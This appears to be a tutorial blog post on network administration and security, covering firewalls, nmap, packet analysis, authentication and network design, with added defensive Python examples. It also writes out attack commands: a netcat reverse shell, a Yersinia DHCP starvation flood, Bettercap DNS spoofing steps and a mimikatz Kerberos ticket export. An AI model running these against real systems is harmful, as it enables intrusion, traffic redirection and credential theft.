
HexaGuard: Mastering the Art of Digital Shadows

🔥 Network Administration & Security – Complete Guide 🔥


This is a comprehensive guide to mastering Network Administration & Security, covering firewalls, network scanning, packet analysis, authentication, and secure network design. Let’s go step by step. 💪


📌 1. Configuring Routers & Firewalls

Firewalls are the first line of defense in network security. Let’s explore:

🔹 Linux Firewalls

1️⃣ iptables (Old but powerful)

  • Controls incoming/outgoing packets using chains & rules.
  • Command Examples:
    bash

    sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT   # Allow SSH
    sudo iptables -A INPUT -p tcp --dport 80 -j DROP     # Block HTTP
    sudo iptables -L -v                                  # List rules
  • Use iptables-save and iptables-restore for rule persistence.

2️⃣ UFW (Uncomplicated Firewall - Easy for beginners)

  • A simple wrapper around iptables.
  • Command Examples:
    bash

    sudo ufw enable           # Enable firewall
    sudo ufw allow 22/tcp     # Allow SSH
    sudo ufw deny 80/tcp      # Block HTTP
    sudo ufw status verbose   # Check status

3️⃣ pfSense (Advanced GUI-based firewall)

  • A BSD-based firewall with a web UI.
  • Supports VPN, traffic shaping, IDS/IPS, etc.
  • Used in enterprise networks.

4️⃣ Windows Defender Firewall

  • Managed via GUI or PowerShell:
    powershell

    New-NetFirewallRule -DisplayName "Block HTTP" -Direction Inbound -Protocol TCP -LocalPort 80 -Action Block

📌 2. Network Scanning

Network scanning helps identify live hosts, open ports, services, and vulnerabilities.

🔹 1️⃣ Nmap (Network Mapper)

  • Host Discovery:
    bash

    nmap -sn 192.168.1.0/24 # Find live hosts
  • Port Scanning:
    bash

    nmap -p 22,80,443 192.168.1.1   # Scan specific ports
    nmap -p- 192.168.1.1            # Scan all 65,535 ports
  • Service & OS Detection:
    bash

    nmap -sV -O 192.168.1.1
  • Vulnerability Scanning (Nmap Scripts):
    bash

    nmap --script=vuln 192.168.1.1
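Scanning your own hosts is only useful if the result is compared with what is supposed to be exposed. As an added example (not part of the original guide), the Python script below parses nmap's grepable output (`nmap -sV -oG - <targets>`) and reports every open port that is not in a per-host allow-list, which turns a one-off scan into a repeatable exposure check. The scan text and the baseline are constructed sample data.

```python
"""Compare an nmap grepable (-oG) scan of your own hosts against an
allow-list of expected services and report unexpected open ports.

Added example, not part of the original guide. SAMPLE_SCAN is constructed
output in the format nmap writes with `nmap -sV -oG - <targets>`.
"""
import re

# Constructed sample of `nmap -sV -oG -` output for two internal hosts.
SAMPLE_SCAN = """\
# Nmap 7.94 scan initiated as: nmap -sV -oG - 192.168.1.1 192.168.1.20
Host: 192.168.1.1 ()\tStatus: Up
Host: 192.168.1.1 ()\tPorts: 22/open/tcp//ssh//OpenSSH 9.2/, 80/open/tcp//http//nginx/, 443/open/tcp//http//nginx/
Host: 192.168.1.20 ()\tStatus: Up
Host: 192.168.1.20 ()\tPorts: 22/open/tcp//ssh//OpenSSH 9.2/, 3306/open/tcp//mysql//MySQL 8.0/, 8080/filtered/tcp//http-proxy///
# Nmap done -- 2 IP addresses (2 hosts up) scanned
"""

# Constructed baseline: the only ports each host is allowed to expose.
BASELINE = {
    "192.168.1.1": {22, 80, 443},
    "192.168.1.20": {22},
}

# Grepable port entry: port/state/protocol/owner/service/rpc_info/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)//([^/]*)//([^/]*)/")


def parse_grepable(text):
    """Return {host: [(port, state, proto, service, version), ...]}."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1]
        entries = [(int(p), st, pr, sv, ver) for p, st, pr, sv, ver in PORT_RE.findall(ports_field)]
        hosts.setdefault(host, []).extend(entries)
    return hosts


def find_unexpected(scan_text, baseline):
    """Return [(host, port, service, version)] for open ports missing from the
    baseline; a host absent from the baseline is reported with port None."""
    unexpected = []
    for host, entries in parse_grepable(scan_text).items():
        allowed = baseline.get(host)
        if allowed is None:
            unexpected.append((host, None, "host not in baseline", ""))
            continue
        for port, state, proto, service, version in entries:
            # Only "open" counts; filtered/closed ports are not reachable exposure.
            if state == "open" and port not in allowed:
                unexpected.append((host, port, service, version))
    return unexpected


if __name__ == "__main__":
    for host, port, service, version in find_unexpected(SAMPLE_SCAN, BASELINE):
        print(f"UNEXPECTED {host}:{port} {service} {version}")
```

On the sample, only 192.168.1.20's MySQL port is flagged; the filtered 8080 is ignored because it is not reachable.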

🔹 2️⃣ Netcat (nc)

  • Check if a port is open:
    bash

    nc -zv 192.168.1.1 80
  • Create a Reverse Shell (Attacker Machine):
    bash

    nc -lvnp 4444
  • Victim connects back:
    bash

    nc 192.168.1.10 4444 -e /bin/bash

🔹 3️⃣ Wireshark & tcpdump

  • Wireshark: GUI-based packet analyzer for sniffing traffic.
  • tcpdump: CLI-based packet sniffer. Example:
    bash

    sudo tcpdump -i eth0 port 80

📌 3. Packet Analysis & Sniffing

Packet sniffing allows attackers/analysts to inspect network traffic.

🔹 Wireshark

  • Use filters like:
    ini

    http.request.method == "POST"
    ip.src == 192.168.1.1
  • Capture credentials, cookies, etc. if traffic is unencrypted.

🔹 tcpdump

  • Capture all HTTP traffic:
    bash

    sudo tcpdump -i eth0 port 80 -w capture.pcap
  • Open capture.pcap in Wireshark for analysis.
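To show what the Wireshark filter above actually inspects, and why a tcpdump capture of port 80 exposes form data, here is an added example (not part of the original guide) that applies the equivalent of `http.request.method == "POST" && ip.src == 192.168.1.1` to a pcap file in pure Python. It serves both the Wireshark filter and the tcpdump `-w capture.pcap` steps: the capture is constructed in memory by `build_pcap()` rather than read from disk, but `read_pcap()` accepts the bytes of a real `tcpdump -w` file (classic pcap, Ethernet link type).

```python
"""Apply the equivalent of the Wireshark filter
    http.request.method == "POST" && ip.src == 192.168.1.1
to a classic pcap in pure Python. Added example, not part of the original
guide: the capture is constructed in memory (build_pcap) instead of read from
a real capture.pcap, but read_pcap() accepts the bytes of a tcpdump -w file."""
import socket
import struct

PCAP_MAGIC = 0xA1B2C3D4
LINKTYPE_ETHERNET = 1


def build_tcp_packet(src_ip, dst_ip, sport, dport, payload):
    """Ethernet + IPv4 + TCP frame. Checksums stay zero: the frame is only parsed, never sent."""
    eth = b"\x00" * 12 + b"\x08\x00"                       # dst MAC, src MAC, EtherType IPv4
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    return eth + ip + tcp


def build_pcap(frames):
    """Classic libpcap file format, little-endian like tcpdump -w on x86."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1700000000 + i, 0, len(frame), len(frame)) + frame
    return out


def read_pcap(data):
    """Yield raw frames; byte order is detected from the magic number."""
    endian = "<" if struct.unpack("<I", data[:4])[0] == PCAP_MAGIC else ">"
    if struct.unpack(endian + "I", data[:4])[0] != PCAP_MAGIC:
        raise ValueError("not a classic pcap file")
    if struct.unpack(endian + "I", data[20:24])[0] != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled here")
    off = 24
    while off + 16 <= len(data):
        incl_len = struct.unpack(endian + "IIII", data[off:off + 16])[2]
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def decode_frame(frame):
    """Return IP/TCP fields and payload for an IPv4/TCP frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
        return None
    tcp_off = 14 + (frame[14] & 0x0F) * 4                 # Ethernet header + IHL
    sport, dport = struct.unpack("!HH", frame[tcp_off:tcp_off + 4])
    data_off = (frame[tcp_off + 12] >> 4) * 4              # TCP data offset
    return {"ip.src": socket.inet_ntoa(frame[26:30]), "ip.dst": socket.inet_ntoa(frame[30:34]),
            "tcp.srcport": sport, "tcp.dstport": dport, "payload": frame[tcp_off + data_off:]}


def http_request_method(payload):
    """HTTP method if the payload begins with a request line, else None."""
    parts = payload.split(b"\r\n", 1)[0].split(b" ")
    if len(parts) == 3 and parts[2].startswith(b"HTTP/"):
        return parts[0].decode("ascii", "replace")
    return None


def filter_posts(pcap_bytes, src_ip):
    """Equivalent of  http.request.method == "POST" && ip.src == src_ip.
    Returns [(ip.dst, request line, body)]; on port 80 the body is readable by anyone on the path."""
    matches = []
    for frame in read_pcap(pcap_bytes):
        pkt = decode_frame(frame)
        if pkt and pkt["ip.src"] == src_ip and http_request_method(pkt["payload"]) == "POST":
            head, _, body = pkt["payload"].partition(b"\r\n\r\n")
            matches.append((pkt["ip.dst"], head.split(b"\r\n")[0].decode(), body.decode(errors="replace")))
    return matches


# Constructed capture: a cleartext login POST and a GET from 192.168.1.1, plus a POST from another host.
SAMPLE_FRAMES = [
    build_tcp_packet("192.168.1.1", "203.0.113.10", 51234, 80,
                     b"POST /login HTTP/1.1\r\nHost: example.com\r\n"
                     b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 23\r\n\r\n"
                     b"user=alice&pass=example"),
    build_tcp_packet("192.168.1.1", "203.0.113.10", 51235, 80, b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"),
    build_tcp_packet("192.168.1.2", "203.0.113.10", 40000, 80, b"POST /login HTTP/1.1\r\n\r\nuser=bob&pass=x"),
]
SAMPLE_PCAP = build_pcap(SAMPLE_FRAMES)

if __name__ == "__main__":
    for dst, request_line, body in filter_posts(SAMPLE_PCAP, "192.168.1.1"):
        print(f"POST to {dst}: {request_line!r} body={body!r}")
```

The filter keeps exactly one of the three constructed frames: the login POST from 192.168.1.1, whose credentials are visible because the request went over plain HTTP. To run it on a real file, replace `SAMPLE_PCAP` with `open("capture.pcap", "rb").read()`; pcapng files (the default for recent Wireshark) are a different format and are rejected by the magic-number check.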

📌 4. DHCP & DNS Poisoning

Attackers can manipulate DHCP and DNS to redirect victims.

🔹 DHCP Starvation Attack

  • Attackers flood a DHCP server with fake requests using Yersinia:
    bash

    yersinia dhcp -attack 1
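From the defender's side, a starvation attempt stands out in the DHCP server's own log as a burst of DHCPDISCOVER messages from many never-before-seen client MACs on one interface. As an added example (not part of the original guide), this Python script detects that pattern over ISC dhcpd syslog lines using a sliding time window; the log lines, the window length and the threshold are constructed/assumed values.

```python
"""Detect a DHCP starvation pattern in ISC dhcpd syslog output: a burst of
DHCPDISCOVER messages from many distinct client MACs in a short window.

Added example, not part of the original guide; the log lines are constructed
in the format dhcpd writes to syslog, and the thresholds are assumptions.
"""
import re
from collections import deque
from datetime import datetime

LINE_RE = re.compile(
    r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ dhcpd\[\d+\]: DHCPDISCOVER from ([0-9a-f:]{17}) via (\S+)")

# Constructed log: one normal client at 12:00, then 40 distinct MACs within 40 seconds.
SAMPLE_LOG = (
    ["Mar 10 12:00:00 gw dhcpd[812]: DHCPDISCOVER from 00:11:22:33:44:55 via eth1",
     "Mar 10 12:00:01 gw dhcpd[812]: DHCPOFFER on 192.168.1.50 to 00:11:22:33:44:55 via eth1"]
    + [f"Mar 10 12:05:{i:02d} gw dhcpd[812]: DHCPDISCOVER from de:ad:be:ef:{i:02x}:{i:02x} via eth1"
       for i in range(40)]
)


def parse_discovers(lines, year=2024):
    """Yield (timestamp, mac, interface) for each DHCPDISCOVER line.
    syslog timestamps carry no year, so one is supplied (assumed)."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
            yield ts, m.group(2), m.group(3)


def detect_starvation(lines, window_seconds=60, max_new_macs=20):
    """Return [(interface, window start, distinct MACs)] for each interface on which
    more than max_new_macs distinct clients sent DHCPDISCOVER within window_seconds."""
    alerts = []
    per_iface = {}          # interface -> deque of (ts, mac) inside the current window
    alerted = set()         # alert once per interface, not once per extra packet
    for ts, mac, iface in parse_discovers(lines):
        window = per_iface.setdefault(iface, deque())
        window.append((ts, mac))
        while (ts - window[0][0]).total_seconds() > window_seconds:
            window.popleft()
        distinct = {m for _, m in window}
        if len(distinct) > max_new_macs and iface not in alerted:
            alerts.append((iface, window[0][0].strftime("%H:%M:%S"), len(distinct)))
            alerted.add(iface)
    return alerts


if __name__ == "__main__":
    for iface, start, count in detect_starvation(SAMPLE_LOG):
        print(f"ALERT: {count} distinct DHCP clients on {iface} within 60s starting {start}")
```

The burst trips the alert at the 21st distinct MAC; the lone client at 12:00 has already aged out of the window by then. On a switch, the usual mitigation for the same pattern is DHCP snooping with a per-port rate limit, which stops the flood before the server ever logs it.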

🔹 DNS Spoofing with Bettercap

  • Redirect victims to a fake website:
    bash

    bettercap -iface eth0
    net.sniff on
    set dns.spoof.domains example.com
    set dns.spoof.address 192.168.1.100
    dns.spoof on

📌 5. Network Authentication

Authentication secures access to network resources.

🔹 LDAP (Lightweight Directory Access Protocol)

  • Used for centralized authentication.
  • Command to query an LDAP server:
    bash

    ldapsearch -x -b "dc=example,dc=com"
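When a query like the one above is built from user input (a login form, a self-service lookup), the filter value has to be escaped or an attacker can rewrite the filter. As an added example (not part of the original guide), this Python snippet builds the same `ldapsearch -x -b "dc=example,dc=com"` query with an RFC 4515-escaped filter and runs it without a shell; `lookup_user()` needs a reachable LDAP server, everything else runs offline. The attribute list and `uid` naming are assumptions.

```python
"""Build an ldapsearch query from untrusted input without LDAP-filter injection.

Added example, not part of the original guide. escape_filter_value() applies
the RFC 4515 escaping rules; build_ldapsearch_argv() returns the argv that
runs the same query as the guide's `ldapsearch -x -b "dc=example,dc=com"`
restricted to one user. The attribute names are assumptions.
"""
import subprocess

# RFC 4515: these characters must appear as \XX inside a filter assertion value.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value):
    """Escape a single assertion value so it cannot close or extend the filter."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def user_filter(username):
    """Filter matching exactly one person entry by uid (uid attribute assumed)."""
    return f"(&(objectClass=person)(uid={escape_filter_value(username)}))"


def build_ldapsearch_argv(base_dn, username, attrs=("cn", "mail")):
    """argv for subprocess.run with no shell, so no quoting problems arise either."""
    return ["ldapsearch", "-x", "-LLL", "-b", base_dn, user_filter(username), *attrs]


def lookup_user(base_dn, username):
    """Run the query and return ldapsearch's LDIF output (needs an LDAP server)."""
    result = subprocess.run(build_ldapsearch_argv(base_dn, username),
                            capture_output=True, text=True, check=True)
    return result.stdout


if __name__ == "__main__":
    print(" ".join(build_ldapsearch_argv("dc=example,dc=com", "alice")))
```

`-LLL` just trims ldapsearch's LDIF comments; the security-relevant parts are the escaping (a `*` or `)` in the username becomes a literal byte instead of a wildcard or a filter terminator) and passing an argv list instead of a shell string.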

🔹 Kerberos

  • Used in Windows Active Directory for secure authentication.
  • Attack: Pass-the-Ticket
    bash

    mimikatz "kerberos::list /export"

🔹 RADIUS & TACACS+

  • RADIUS: Used for VPN, WiFi authentication.
  • TACACS+: Used in Cisco networks for device authentication.

📌 6. Secure Network Design

🔹 DMZ (Demilitarized Zone)

  • A subnet that hosts public-facing services (Web, Mail, DNS).
  • Protects the internal network from direct exposure.

🔹 VLAN (Virtual LAN)

  • Separates devices into isolated groups using 802.1Q.
  • Commands to configure VLAN (Cisco Switch):
    bash

    enable
    configure terminal
    vlan 10
    name HR_Network
    exit

🔹 VPN (Virtual Private Network)

  • Encrypts traffic between remote users and the network.
  • Example: OpenVPN setup on Linux:
    bash

    sudo apt install openvpn
    sudo openvpn --config myvpn.conf

🔹 Zero Trust Security

  • Never trust, always verify:
    • Multi-factor authentication (MFA).
    • Role-Based Access Control (RBAC).
    • Continuous monitoring with SIEM tools like Splunk.

🔥 Conclusion

✅ Now you have a strong foundation in Network Administration & Security. 🛡️

Next Steps:

  • Master Wireshark, Metasploit, Burp Suite for advanced network exploitation.
  • Set up a home lab with pfSense, OpenVPN, and VLANs.
  • Practice attacks & defenses using tools like Kali Linux & Parrot OS.
